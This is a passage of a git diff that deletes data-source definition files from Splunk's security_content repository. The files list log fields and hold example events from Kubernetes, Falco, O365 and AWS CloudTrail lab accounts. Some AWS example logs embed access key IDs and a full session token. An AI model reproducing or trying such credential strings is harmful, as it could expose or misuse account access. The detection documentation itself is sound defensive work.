ecurity_content/actions/runs/2088708615/rerun","previous_attempt_url":null,"workflow_url":"https://api.github.com/repos/splunk/security_content/actions/workflows/4692335","head_commit":{"id":"4049334910ea3d52a917ca35aed66d11c80ed966","tree_id":"df4ddc1359be3b19f093b7a27dbf5708187743a0","message":"small
-  change","timestamp":"2022-04-04T08:43:01Z","author":{"name":"jsmith","email":"jsmith@evilcorp.com"},"committer":{"name":"jsmith","email":"jsmith@evilcorp.com"}},"repository":{"id":162346001,"node_id":"MDEwOlJlcG9zaXRvcnkxNjIzNDYwMDE=","name":"security_content","full_name":"splunk/security_content","private":false,"owner":{"login":"splunk","id":651467,"node_id":"MDEyOk9yZ2FuaXphdGlvbjY1MTQ2Nw==","avatar_url":"https://avatars.githubusercontent.com/u/651467?v=4","gravatar_id":"","url":"https://api.github.com/users/splunk","html_url":"https://github.com/splunk","followers_url":"https://api.github.com/users/splunk/followers","following_url":"https://api.github.com/users/splunk/following{/other_user}","gists_url":"https://api.github.com/users/splunk/gists{/gist_id}","starred_url":"https://api.github.com/users/splunk/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/splunk/subscriptions","organizations_url":"https://api.github.com/users/splunk/orgs","repos_url":"https://api.github.com/users/splunk/repos","events_url":"https://api.github.com/users/splunk/events{/privacy}","received_events_url":"https://api.github.com/users/splunk/received_events","type":"Organization","site_admin":false},"html_url":"https://github.com/splunk/security_content","description":"Splunk
-  Security Content","fork":false,"url":"https://api.github.com/repos/splunk/security_content","forks_url":"https://api.github.com/repos/splunk/security_content/forks","keys_url":"https://api.github.com/repos/splunk/security_content/keys{/key_id}","collaborators_url":"https://api.github.com/repos/splunk/security_content/collaborators{/collaborator}","teams_url":"https://api.github.com/repos/splunk/security_content/teams","hooks_url":"https://api.github.com/repos/splunk/security_content/hooks","issue_events_url":"https://api.github.com/repos/splunk/security_content/issues/events{/number}","events_url":"https://api.github.com/repos/splunk/security_content/events","assignees_url":"https://api.github.com/repos/splunk/security_content/assignees{/user}","branches_url":"https://api.github.com/repos/splunk/security_content/branches{/branch}","tags_url":"https://api.github.com/repos/splunk/security_content/tags","blobs_url":"https://api.github.com/repos/splunk/security_content/git/blobs{/sha}","git_tags_url":"https://api.github.com/repos/splunk/security_content/git/tags{/sha}","git_refs_url":"https://api.github.com/repos/splunk/security_content/git/refs{/sha}","trees_url":"https://api.github.com/repos/splunk/security_content/git/trees{/sha}","statuses_url":"https://api.github.com/repos/splunk/security_content/statuses/{sha}","languages_url":"https://api.github.com/repos/splunk/security_content/languages","stargazers_url":"https://api.github.com/repos/splunk/security_content/stargazers","contributors_url":"https://api.github.com/repos/splunk/security_content/contributors","subscribers_url":"https://api.github.com/repos/splunk/security_content/subscribers","subscription_url":"https://api.github.com/repos/splunk/security_content/subscription","commits_url":"https://api.github.com/repos/splunk/security_content/commits{/sha}","git_commits_url":"https://api.github.com/repos/splunk/security_content/git/commits{/sha}","comments_url":"https://api.github.com/repos/splunk/security_content/comments{/number}","issue_comment_url":"https://api.github.com/repos/splunk/security_content/issues/comments{/number}","contents_url":"https://api.github.com/repos/splunk/security_content/contents/{+path}","compare_url":"https://api.github.com/repos/splunk/security_content/compare/{base}...{head}","merges_url":"https://api.github.com/repos/splunk/security_content/merges","archive_url":"https://api.github.com/repos/splunk/security_content/{archive_format}{/ref}","downloads_url":"https://api.github.com/repos/splunk/security_content/downloads","issues_url":"https://api.github.com/repos/splunk/security_content/issues{/number}","pulls_url":"https://api.github.com/repos/splunk/security_content/pulls{/number}","milestones_url":"https://api.github.com/repos/splunk/security_content/milestones{/number}","notifications_url":"https://api.github.com/repos/splunk/security_content/notifications{?since,all,participating}","labels_url":"https://api.github.com/repos/splunk/security_content/labels{/name}","releases_url":"https://api.github.com/repos/splunk/security_content/releases{/id}","deployments_url":"https://api.github.com/repos/splunk/security_content/deployments"},"head_repository":{"id":162346001,"node_id":"MDEwOlJlcG9zaXRvcnkxNjIzNDYwMDE=","name":"security_content","full_name":"splunk/security_content","private":false,"owner":{"login":"splunk","id":651467,"node_id":"MDEyOk9yZ2FuaXphdGlvbjY1MTQ2Nw==","avatar_url":"https://avatars.githubusercontent.com/u/651467?v=4","gravatar_id":"","url":"https://api.github.com/users/splunk","html_url":"https://github.com/splunk","followers_url":"https://api.github.com/users/splunk/followers","following_url":"https://api.github.com/users/splunk/following{/other_user}","gists_url":"https://api.github.com/users/splunk/gists{/gist_id}","starred_url":"https://api.github.com/users/splunk/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/splunk/subscriptions","organizations_url":"https://api.github.com/users/splunk/orgs","repos_url":"https://api.github.com/users/splunk/repos","events_url":"https://api.github.com/users/splunk/events{/privacy}","received_events_url":"https://api.github.com/users/splunk/received_events","type":"Organization","site_admin":false},"html_url":"https://github.com/splunk/security_content","description":"Splunk
-  Security Content","fork":false,"url":"https://api.github.com/repos/splunk/security_content","forks_url":"https://api.github.com/repos/splunk/security_content/forks","keys_url":"https://api.github.com/repos/splunk/security_content/keys{/key_id}","collaborators_url":"https://api.github.com/repos/splunk/security_content/collaborators{/collaborator}","teams_url":"https://api.github.com/repos/splunk/security_content/teams","hooks_url":"https://api.github.com/repos/splunk/security_content/hooks","issue_events_url":"https://api.github.com/repos/splunk/security_content/issues/events{/num'
diff --git a/data_sources/cloud/Google_Workspace.yml b/data_sources/cloud/Google_Workspace.yml
deleted file mode 100644
index 41eba25a44..0000000000
--- a/data_sources/cloud/Google_Workspace.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: Google Workspace
-id: 9ef3a321-c641-4798-8a92-9c10c714a004
-author: Patrick Bareiss, Splunk
-source: gws:reports:admin
-sourcetype: gws:reports:admin
-separator: event.name
-supported_TA:
-  name: Splunk Add-on for Google Workspace
-  version: 2.6.3
-  url: https://splunkbase.splunk.com/app/5556
-event_names:
-- event_name: Google Workspace
-  data_source: data_sources/cloud/event_sources/Google_Workspace.yml
-- event_name: Google Workspace login_failure
-  data_source: data_sources/cloud/event_sources/Google_Workspace_login_failure.yml
-- event_name: Google Workspace login_success
-  data_source: data_sources/cloud/event_sources/Google_Workspace_login_success.yml
diff --git a/data_sources/cloud/Kubernetes_Audit.yml b/data_sources/cloud/Kubernetes_Audit.yml
deleted file mode 100644
index 0c9dd3ec03..0000000000
--- a/data_sources/cloud/Kubernetes_Audit.yml
+++ /dev/null
@@ -1,61 +0,0 @@
-name: Kubernetes Audit
-id: 6c25181a-0c07-4aaf-90e6-77ab1f0e6699
-author: Patrick Bareiss, Splunk
-source: kubernetes
-sourcetype: _json
-supported_TA: {}
-event_names: []
-fields:
-  - _time
-  - annotations.authorization.k8s.io/decision
-  - annotations.authorization.k8s.io/reason
-  - apiVersion
-  - auditID
-  - eventtype
-  - host
-  - index
-  - kind
-  - level
-  - linecount
-  - objectRef.apiGroup
-  - objectRef.apiVersion
-  - objectRef.namespace
-  - objectRef.resource
-  - punct
-  - requestReceivedTimestamp
-  - requestURI
-  - responseObject.apiVersion
-  - responseObject.code
-  - responseObject.details.group
-  - responseObject.details.kind
-  - responseObject.kind
-  - responseObject.message
-  - responseObject.reason
-  - responseObject.status
-  - responseStatus.code
-  - responseStatus.details.group
-  - responseStatus.details.kind
-  - responseStatus.message
-  - responseStatus.reason
-  - responseStatus.status
-  - source
-  - sourceIPs{}
-  - sourcetype
-  - splunk_server
-  - stage
-  - stageTimestamp
-  - tag
-  - tag::eventtype
-  - timestamp
-  - user.groups{}
-  - user.uid
-  - user.username
-  - userAgent
-  - verb
-example_log:
-  '{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","auditID":"582c31ab-4906-49bb-9ff9-872f980ccb84","stage":"ResponseComplete","requestURI":"/apis/batch/v1/namespaces/test2/jobs?fieldManager=kubectl-create\u0026fieldValidation=Strict","verb":"create","user":{"username":"k8s-test-user","uid":"aws-iam-authenticator:591511147606:AROAYTOGP2RLFHNBOTP5J","groups":["system:authenticated"]},"sourceIPs":["176.95.188.101"],"userAgent":"kubectl/v1.27.2
-  (darwin/arm64) kubernetes/7f6f68f","objectRef":{"resource":"jobs","namespace":"test2","apiGroup":"batch","apiVersion":"v1"},"responseStatus":{"metadata":{},"status":"Failure","message":"jobs.batch
-  is forbidden: User \"k8s-test-user\" cannot create resource \"jobs\" in API group
-  \"batch\" in the namespace \"test2\"","reason":"Forbidden","details":{"group":"batch","kind":"jobs"},"code":403},"responseObject":{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"jobs.batch
-  is forbidden: User \"k8s-test-user\" cannot create resource \"jobs\" in API group
-  \"batch\" in the namespace \"test2\"","reason":"Forbidden","details":{"group":"batch","kind":"jobs"},"code":403},"requestReceivedTimestamp":"2023-12-07T14:44:53.358394Z","stageTimestamp":"2023-12-07T14:44:53.375985Z","annotations":{"authorization.k8s.io/decision":"forbid","authorization.k8s.io/reason":""}}'
diff --git a/data_sources/cloud/Kubernetes_Falco.yml b/data_sources/cloud/Kubernetes_Falco.yml
deleted file mode 100644
index ad8f1bd723..0000000000
--- a/data_sources/cloud/Kubernetes_Falco.yml
+++ /dev/null
@@ -1,48 +0,0 @@
-name: Kubernetes Falco
-id: 23c0eeed-840a-4711-a41b-6819c1ffbba5
-author: Patrick Bareiss, Splunk
-source: kubernetes
-sourcetype: kube:container:falco
-supported_TA: {}
-event_names: []
-fields:
-  - _time
-  - command
-  - container_id
-  - container_image
-  - container_image_tag
-  - container_name
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - evt_type
-  - exe_flags
-  - host
-  - index
-  - k8s_ns
-  - k8s_pod_name
-  - linecount
-  - parent
-  - proc_exepath
-  - process
-  - punct
-  - source
-  - sourcetype
-  - splunk_server
-  - terminal
-  - timeendpos
-  - timestartpos
-  - user
-  - user_loginuid
-  - user_uid
-example_log:
-  "12:18:18.691725165: Notice A shell was spawned in a container with an
-  attached terminal (evt_type=execve user=root user_uid=0 user_loginuid=-1 process=bash
-  proc_exepath=/usr/lib/splunk-otel-collector/agent-bundle/bin/bash parent=runc command=bash
-  -il terminal=34816 exe_flags=EXE_WRITABLE container_id=7a2566e8e462 container_image=quay.io/signalfx/splunk-otel-collector
-  container_image_tag=0.88.0 container_name=otel-collector k8s_ns=default k8s_pod_name=my-splunk-otel-collector-agent-9sdhr)"
diff --git a/data_sources/cloud/O365.yml b/data_sources/cloud/O365.yml
deleted file mode 100644
index ac2b4d541c..0000000000
--- a/data_sources/cloud/O365.yml
+++ /dev/null
@@ -1,123 +0,0 @@
-name: O365
-id: 11c0eed5-3f3f-42e4-bf72-30f11295a686
-author: Patrick Bareiss, Splunk
-source: o365
-sourcetype: o365:management:activity
-separator: Operation
-supported_TA:
-  name: Splunk Add-on for Microsoft Office 365
-  version: 4.5.1
-  url: https://splunkbase.splunk.com/app/4055
-event_names:
-- event_name: O365
-  data_source: data_sources/cloud/event_sources/O365.yml
-- event_name: O365 Add app role assignment grant to user.
-  data_source: data_sources/cloud/event_sources/O365_Add_app_role_assignment_grant_to_user..yml
-- event_name: O365 Add app role assignment to service principal.
-  data_source: data_sources/cloud/event_sources/O365_Add_app_role_assignment_to_service_principal..yml
-- event_name: O365 Add member to role.
-  data_source: data_sources/cloud/event_sources/O365_Add_member_to_role..yml
-- event_name: O365 Add owner to application.
-  data_source: data_sources/cloud/event_sources/O365_Add_owner_to_application..yml
-- event_name: O365 Add service principal.
-  data_source: data_sources/cloud/event_sources/O365_Add_service_principal..yml
-- event_name: O365 Add-MailboxPermission
-  data_source: data_sources/cloud/event_sources/O365_Add-MailboxPermission.yml
-- event_name: O365 Change user license.
-  data_source: data_sources/cloud/event_sources/O365_Change_user_license..yml
-- event_name: O365 Consent to application.
-  data_source: data_sources/cloud/event_sources/O365_Consent_to_application..yml
-- event_name: O365 Disable Strong Authentication.
-  data_source: data_sources/cloud/event_sources/O365_Disable_Strong_Authentication..yml
-- event_name: O365 MailItemsAccessed
-  data_source: data_sources/cloud/event_sources/O365_MailItemsAccessed.yml
-- event_name: O365 ModifyFolderPermissions
-  data_source: data_sources/cloud/event_sources/O365_ModifyFolderPermissions.yml
-- event_name: O365 Set Company Information.
-  data_source: data_sources/cloud/event_sources/O365_Set_Company_Information..yml
-- event_name: O365 Set-Mailbox
-  data_source: data_sources/cloud/event_sources/O365_Set-Mailbox.yml
-- event_name: O365 Update application.
-  data_source: data_sources/cloud/event_sources/O365_Update_application..yml
-- event_name: O365 Update authorization policy.
-  data_source: data_sources/cloud/event_sources/O365_Update_authorization_policy..yml
-- event_name: O365 Update user.
-  data_source: data_sources/cloud/event_sources/O365_Update_user..yml
-- event_name: O365 UserLoggedIn
-  data_source: data_sources/cloud/event_sources/O365_UserLoggedIn.yml
-- event_name: O365 UserLoginFailed
-  data_source: data_sources/cloud/event_sources/O365_UserLoginFailed.yml
-fields:
-- _time
-- AppAccessContext.IssuedAtTime
-- AppAccessContext.UniqueTokenId
-- AppId
-- ClientAppId
-- ClientIP
-- CreationTime
-- ExternalAccess
-- Id
-- Name
-- ObjectId
-- Operation
-- OrganizationId
-- OrganizationName
-- OriginatingServer
-- Parameters{}.Name
-- Parameters{}.Value
-- RecordType
-- RequestId
-- ResultStatus
-- Role
-- SessionId
-- User
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- status
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"AppAccessContext": {"IssuedAtTime": "2023-10-17T19:13:05", "UniqueTokenId":
-  "g7oAmNhLoU-8qJVeWeAwAA"}, "CreationTime": "2023-10-17T19:19:59", "Id": "3d26a8cd-d8f4-42f9-1898-08dbcf460e5a",
-  "Operation": "New-ManagementRoleAssignment", "OrganizationId": "aeb12f6b-1ff3-4a18-9ea2-29aa57e2ae08",
-  "RecordType": 1, "ResultStatus": "True", "UserKey": "1003BFFD98415B4E", "UserType":
-  2, "Version": 1, "Workload": "Exchange", "ClientIP": "71.1.1.1:61528", "ObjectId":
-  "splunkresearch.onmicrosoft.com\\attack-test", "UserId": "compromisedAdmin@splunkresearch.onmicrosoft.com",
-  "AppId": "fb78d390-0c51-40cd-8e17-fdbfab77341b", "ClientAppId": "", "ExternalAccess":
-  false, "OrganizationName": "splunkresearch.onmicrosoft.com", "OriginatingServer":
-  "BYAPR18MB2408 (15.20.6863.047)", "Parameters": [{"Name": "User", "Value": "lowpriv@splunkresearch.onmicrosoft.com"},
-  {"Name": "Name", "Value": "attack-test"}, {"Name": "Role", "Value": "ApplicationImpersonation"}],
-  "RequestId": "53a50583-e429-63a4-c9f7-8fbb14437e8a", "SessionId": "e2a028f1-d0e1-4ddb-a5a7-ec57343457ad"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_AssumeRoleWithSAML.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_AssumeRoleWithSAML.yml
deleted file mode 100644
index a7b5023083..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_AssumeRoleWithSAML.yml
+++ /dev/null
@@ -1,92 +0,0 @@
-event_name: AWS CloudTrail AssumeRoleWithSAML
-fields:
-- _time
-- action
-- app
-- awsRegion
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.durationSeconds
-- requestParameters.principalArn
-- requestParameters.roleArn
-- requestParameters.roleSessionName
-- requestParameters.sAMLAssertionID
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements.assumedRoleUser.arn
-- responseElements.assumedRoleUser.assumedRoleId
-- responseElements.audience
-- responseElements.credentials.accessKeyId
-- responseElements.credentials.expiration
-- responseElements.credentials.sessionToken
-- responseElements.issuer
-- responseElements.nameQualifier
-- responseElements.subject
-- responseElements.subjectType
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_user
-- src_user_id
-- src_user_type
-- start_time
-- status
-- tag
-- tag::action
-- tag::eventtype
-- temp_access_key
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.identityProvider
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- user_agent
-- user_arn
-- user_id
-- user_name
-- user_role
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "SAMLUser", "principalId": "ZRu9MRAjiG9tvi1QBNfdI664G5A=:rodsoto@rodsoto.onmicrosoft.com", "userName": "rodsoto@rodsoto.onmicrosoft.com", "identityProvider": "ZRu9MRAjiG9tvi1QBNfdI664G5A="}, "eventTime": "2021-01-22T03:44:16Z", "eventSource": "sts.amazonaws.com", "eventName": "AssumeRoleWithSAML", "awsRegion": "us-east-1", "sourceIPAddress": "72.21.217.152", "userAgent": "AWS Signin, aws-internal/3 aws-sdk-java/1.11.898 Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.275-b01 java/1.8.0_275 kotlin/1.3.72 vendor/Oracle_Corporation", "requestParameters": {"sAMLAssertionID": "_d33ba0ad-0c88-4b83-80a6-27c08027d000", "roleSessionName": "rodsoto@rodsoto.onmicrosoft.com", "durationSeconds": 3600, "roleArn": "arn:aws:iam::111111111111:role/rodonmicrotestrole", "principalArn": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"}, "responseElements": {"subjectType": "urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress", "issuer": "https://sts.windows.net/0e8108b1-18e9-41a4-961b-dfcddf92ef08/", "credentials": {"accessKeyId": "ASIAYTOGP2RLKJXOV7VR", "expiration": "Jan 22, 2021 3:59:16 AM", "sessionToken": "IQoJb3JpZ2luX2VjENz//////////wEaCXVzLWVhc3QtMSJGMEQCIHl/WQdLq53ULYl10fPtpeV3H7da9mOXGuIStvhdDA6kAiAdO/7rocOXAtyDV+0MJhSj/piqlqEI/BcAKm8zqBhOgiqgAwi1//////////8BEAIaDDU5MTUxMTE0NzYwNiIMAFP8GfyI/x1fKCHYKvQCznxxgKnEdcuvrr/fBLmHxEDjQ9vQxjasA8gZF8GawZ5SFH9ViKqoZh93bYkOwKqZD8cdqJIo9SYL17RGhVqxzvsjU4+QsRXTN5eGgh+LyF9EZqeCl6oCkaTJqNrXHuenzTi0yiL510LKsSckrAm8+SuwI/jQu3oE1BEcJQieAc4RjYx3II+1cUvyfRlFvR2NDfZhdWcQvAivV06KJg9c2zfCF0Agzn/YZSNvsRL5UhnKhJ2wktSvT8lR0mS3n9xR1j3iYNxVDHab180cnfkP3G6tAmxj5U29diNQrusJxKWWhr/Q9wHRdDj5dO2QUZzSymKKU/UiRJ8nyYPINaJ8XWVAPiT4QgzpMxotkvSkDLEG/brB9yEr2p7W8Y3xMGZ37qSGkuU4z9x40RU9G1XPhv27NO9aaGs/VXYTMCzWRNxnsLfNkk/DihrcaR0SclRcvs+zmfe1ZUoGnfjNYm+AIyJi4D7OrXF5/Mt46Z2y76DnULlAMJCUqYAGOpsBw4fyafV8OizX7Lebh2JRXFZsWBY1GTpyGvO5otrw++4axud44vYVi5iU5rbJxtTBm4vtJartxgXoPJFnQuat9gLrIlXhjmg+m50a5xs1Ut2UWEsWY2Duu4jA9ap7P7dYv9kIK9P2uyhsjKQhCjTpfe4I/llcupbDotYBJuvlB5n85a5kgiSriFk5zetoXQIweuYEWQZsD/AN+LE="}, "nameQualifier": "ZRu9MRAjiG9tvi1QBNfdI664G5A=", "assumedRoleUser": {"assumedRoleId": "AROAYTOGP2RLKFUVAQAIJ:rodsoto@rodsoto.onmicrosoft.com", "arn": "arn:aws:sts::111111111111:assumed-role/rodonmicrotestrole/rodsoto@rodsoto.onmicrosoft.com"}, "subject": "rodsoto@rodsoto.onmicrosoft.com", "audience": "https://signin.aws.amazon.com/saml"}, "requestID": "e19c7a7f-cd96-4642-9ee6-2360a7b01b12", "eventID": "b25b825d-9c9b-49d3-9ecd-290dbe8f2c29", "readOnly": true, "resources": [{"accountId": "111111111111", "type": "AWS::IAM::Role", "ARN": "arn:aws:iam::111111111111:role/rodonmicrotestrole"}, {"accountId": "111111111111", "type": "AWS::IAM::SAMLProvider", "ARN": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"}], "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_ConsoleLogin.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_ConsoleLogin.yml
deleted file mode 100644
index a8d3a254c3..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_ConsoleLogin.yml
+++ /dev/null
@@ -1,80 +0,0 @@
-event_name: AWS CloudTrail ConsoleLogin
-fields:
-- _time
-- action
-- additionalEventData.LoginTo
-- additionalEventData.MFAUsed
-- additionalEventData.MobileVersion
-- app
-- authentication_method
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- desc
-- dest
-- dvc
-- errorCode
-- errorMessage
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- reason
-- recipientAccountId
-- region
-- requestParameters
-- responseElements.ConsoleLogin
-- result
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.type
-- userIdentity.userName
-- user_access_key
-- user_agent
-- user_group_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "accountId": "140429656527", "accessKeyId": "", "userName": "HIDDEN_DUE_TO_SECURITY_REASONS"}, "eventTime": "2022-10-19T20:33:38Z", "eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin", "awsRegion": "us-east-1", "sourceIPAddress": "142.254.89.27", "userAgent": "Go-http-client/1.1", "errorMessage": "No username found in supplied account", "requestParameters": null, "responseElements": {"ConsoleLogin": "Failure"}, "additionalEventData": {"LoginTo": "https://console.aws.amazon.com", "MobileVersion": "No", "MFAUsed": "No"}, "eventID": "9fcfb8c3-3fca-48db-85d2-7b107f9d95d0", "readOnly": false, "eventType": "AwsConsoleSignIn", "managementEvent": true, "recipientAccountId": "140429656527", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "signin.aws.amazon.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CopyObject.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CopyObject.yml
deleted file mode 100644
index 325bc243c7..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CopyObject.yml
+++ /dev/null
@@ -1,86 +0,0 @@
-event_name: AWS CloudTrail CopyObject
-fields:
-- _time
-- additionalEventData.AuthenticationMethod
-- additionalEventData.CipherSuite
-- additionalEventData.SSEApplied
-- additionalEventData.SignatureVersion
-- additionalEventData.bytesTransferredIn
-- additionalEventData.bytesTransferredOut
-- additionalEventData.x-amz-id-2
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.Host
-- requestParameters.bucketName
-- requestParameters.key
-- requestParameters.x-amz-copy-source
-- requestParameters.x-amz-server-side-encryption
-- requestParameters.x-amz-server-side-encryption-aws-kms-key-id
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements.x-amz-server-side-encryption
-- responseElements.x-amz-server-side-encryption-aws-kms-key-id
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLNALZHZ6KX", "arn": "arn:aws:iam::111111111111:user/patrick_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLJ2OYSF6E", "userName": "patrick_cli"}, "eventTime": "2021-01-11T12:40:47Z", "eventSource": "s3.amazonaws.com", "eventName": "CopyObject", "awsRegion": "us-west-2", "sourceIPAddress": "95.90.199.65", "userAgent": "[aws-cli/2.0.45 Python/3.7.4 Darwin/20.2.0 exe/x86_64 command/s3.cp]", "requestParameters": {"bucketName": "patricktestbucketencrypt", "x-amz-server-side-encryption-aws-kms-key-id": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1", "Host": "patricktestbucketencrypt.s3.us-west-2.amazonaws.com", "x-amz-server-side-encryption": "aws:kms", "x-amz-copy-source": "patricktestbucketencrypt/kms_aws_events.json", "key": "kms_aws_events_encrypted.json"}, "responseElements": {"x-amz-server-side-encryption": "aws:kms", "x-amz-server-side-encryption-aws-kms-key-id": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1"}, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 0.0, "SSEApplied": "SSE_KMS", "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "fqzX1iZV6ImDtkFxbGvziOE6fUwryRa+PhnLckfVAkLNHdbCAHNq4l/yckUd1a2HNJPL6NAS01U=", "bytesTransferredOut": 234.0}, "requestID": "6A7359F7A9414B02", "eventID": "b20d43de-175d-4443-acd7-f5f3e587ae00", "readOnly": false, "resources": [{"type": "AWS::S3::Object", "ARN": "arn:aws:s3:::patricktestbucketencrypt/kms_aws_events_encrypted.json"}, {"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::patricktestbucketencrypt"}, {"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::patricktestbucketencrypt"}, {"type": "AWS::S3::Object", "ARN": "arn:aws:s3:::patricktestbucketencrypt/kms_aws_events.json"}], "eventType": "AwsApiCall", "managementEvent": false, "recipientAccountId": "111111111111", "eventCategory": "Data"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateAccessKey.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateAccessKey.yml
deleted file mode 100644
index c21bb5b0e1..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateAccessKey.yml
+++ /dev/null
@@ -1,80 +0,0 @@
-event_name: AWS CloudTrail CreateAccessKey
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.userName
-- responseElements.accessKey.accessKeyId
-- responseElements.accessKey.createDate
-- responseElements.accessKey.status
-- responseElements.accessKey.userName
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_user_name
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
